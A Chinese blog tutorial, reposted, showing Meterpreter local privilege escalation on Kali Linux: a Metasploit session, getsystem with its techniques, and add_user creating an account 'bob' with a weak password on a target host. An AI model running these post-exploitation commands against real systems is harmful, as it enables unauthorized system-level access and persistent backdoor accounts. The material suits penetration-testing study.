博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Kali-linux本地权限提升
阅读量:6242 次
发布时间:2019-06-22

本文共 1224 字,大约阅读时间需要 4 分钟。

上一节介绍了窃取目标系统令牌,现在来介绍窃取令牌后如何提升在目标系统上的权限。提升本地权限可以使用户访问目标系统,并且进行其他的操作,如创建用户和组等。本节将介绍本地权限提升。

同样的实现本地权限提升,也需要连接到Meterpreter会话,具体操作就不再介绍。本地权限提升的具体操作步骤如下所示。

(1)启动Meterpreter会话。执行命令如下所示:

msf auxiliary(browser_autopwn) > sessions -i 1[*] Starting interaction with 1…meterpreter >

从输出的信息可以看到,成功启动了Meterpreter会话。

(2)使用getsystem命令提升本地权限。首先,查看该命令的帮助信息。执行命令如下所示:

meterpreter > getsystem -hUsage: getsystem [options]Attempt to elevate your privilege to that of local system.OPTIONS:  -h             Help Banner.  -t 
The technique to use. (Default to '0'). 0 : All techniques available 1 : Service - Named Pipe Impersonation (In Memory/Admin) 2 : Service - Named Pipe Impersonation (Dropper/Admin) 3 : Service - Token Duplication (In Memory/Admin)

输出的信息显示了getsystem命令的语法格式、作用及选项等。此时就可以根据自己的需要,使用相应的选项来提升本地权限。

(3)使用getsystem命令提升本地权限。执行命令如下所示:

meterpreter > getsystem…got system (via technique 1).meterpreter >

从输出的信息可以看到,自动选择了方法1。此时该用户就拥有了目标系统中Test用户的权限了,然后就可以做其他的操作,如创建文件、创建用户和组等。如使用该用户在目标系统上192.168.41.146创建一个名为bob的用户。执行命令如下所示:

meterpreter > add_user bob 123456 -h 192.168.41.146

执行以上命令后,可以在主机192.168.41.146上查看到创建的bob用户。

转载于:https://www.cnblogs.com/student-programmer/p/6728826.html

你可能感兴趣的文章
和为S的两个数字
查看>>
NPOI导出模板样式
查看>>
jsp请求由servlet响应的方式
查看>>
16 款最流行的 JavaScript 框架
查看>>
使用awrextr.sql导出awr原始数据
查看>>
分享一次失败的项目实践经验
查看>>
jedispool 连 redis
查看>>
PadLeft 补零
查看>>
注意了,99%通过天天特价的技巧!
查看>>
iOS H5容器的一些探究(一):UIWebView和WKWebView的比较和选择
查看>>
activity启动模式
查看>>
如何将页面设置为微信端才能打开
查看>>
centos7如何关闭防火墙
查看>>
iOS开发中你是否遇到这些经验问题
查看>>
cellery ImportError & AttributeError
查看>>
正则表达式
查看>>
算法实验题 5.1 湖泊
查看>>
【235】Win10-Chrome 临时视频文件夹
查看>>
MongoDB GridFS——本质上是将一个文件分割为大小为256KB的chunks 每个chunk里会放md5标识 取文件的时候会将这些chunks合并为一个整体返回...
查看>>
Spring泛型依赖注入
查看>>